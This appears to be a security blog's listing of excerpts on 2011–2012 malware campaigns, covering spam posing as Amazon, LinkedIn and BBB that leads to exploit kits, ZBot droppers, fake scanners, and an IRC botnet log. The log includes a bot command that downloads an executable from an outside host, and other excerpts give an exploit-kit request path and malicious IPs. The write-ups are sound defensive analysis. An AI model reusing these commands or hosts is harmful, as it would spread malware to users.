WordPress-how-to-videos(dot)com Spreads Java Exploits

When we analyzed a few Twitter followers on one of our websites, we noted that there was a user following us, see the image: We have analyzed the (infected) website: www (dot) wordpress-how-to-videos (dot) com The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220.34.22 (330.hostserv.eu). The server […]

Amazon.com Order Confirmation leads to Blackhole Exploit Kit

We received a few emails with the subject: Amazon.com Order Confirmation Inside the email message there is an HREF link that redirects users to a malicious web page containing malicious JavaScript code used to redirect users to the main URL of the Blackhole exploit kit: The Blackhole exploit kit URL is: GET /main.php?page=017f3bb5c2be6a41 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE […]

Spam “Your Bill Me Later notice” leads to Incognito exploit kit

Users have reported another malicious email message with the subject “Your Bill Me Later notice” that states you have made a payment of $60.12 over the phone to the Bill Me Later website. The email body is full of HREF links that point to many malicious URLs; see a screenshot of the email message: Email […]

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that appears to have been sent by LinkedIn: The email header info shows it is a scam: Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24]) Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net Date: Fri, 04 May 2012 08:34:11 -0700 From: "Order" @fixnot.com.tr Subject: Link LinkedIn Mail The email body also contains a few […]

Express LinkedIn Mail: spread Blackhole Exploit Kit URLs

We have received a few emails that appeared to have been sent from LinkedIn: But after checking the email header details it was clearly spam: Return-Path: trtro@www.trt.ro Received: from vps136.whmpanels.com (unknown [89.42.219.181]) Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com Date: Fri, 30 Mar 2012 21:37:47 +0100 From: "Support" trtro@www.trt.ro Subject: Express LinkedIn Mail The A HREF links […]

Spam “Your updated information is necessary” leads to Blackhole Exploit Kit

We have received various spam emails that imitate messages from the Better Business Bureau (BBB), but are really used to spread malicious links that lead to the Blackhole Exploit Kit. The subject of the emails looks like this: Your updated information is necessary A screenshot of the email: Other details of the emails: Return-Path: <top-team3@ms16.hinet.net> Received: […]

Browsers Exploits Delivered as HTML Attachment

We have logged more than 300 email messages with various attached HTML files containing obfuscated JavaScript code that is used to redirect users to download malicious executable files that install the ZBot banking trojan. We also noticed that some HTML files redirected us to external URLs containing web browser exploit kits with the […]

Google Translate used by spammers to bypass Anti-Spam filters

Google Translate is a free service created by Google that translates any web page, content or document from its native language to a language specified by the user of the service. We have noticed that some spam messages contain links to websites that use the Google Translate service to translate their page content, but […]

Malicious URLs Hosting Fake Scanner Pages

We have detected a few fake scanner pages that are still active and that distribute the dangerous executable files of rogue security software. Initial fake alert: Fake scanner page in action: Prompt to download the (infected) setup file of the rogue software: Report date: 2011-04-15 01:10:23 (GMT 1) File name: bestav2-exe File size: 374784 bytes […]

IRC Botnet Logs with MSN Spreader

We noticed the following details in a log file in our sandbox: :m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr :Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/ :Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177 These details are related to an IRC botnet and we can extract a few commands: 1. […]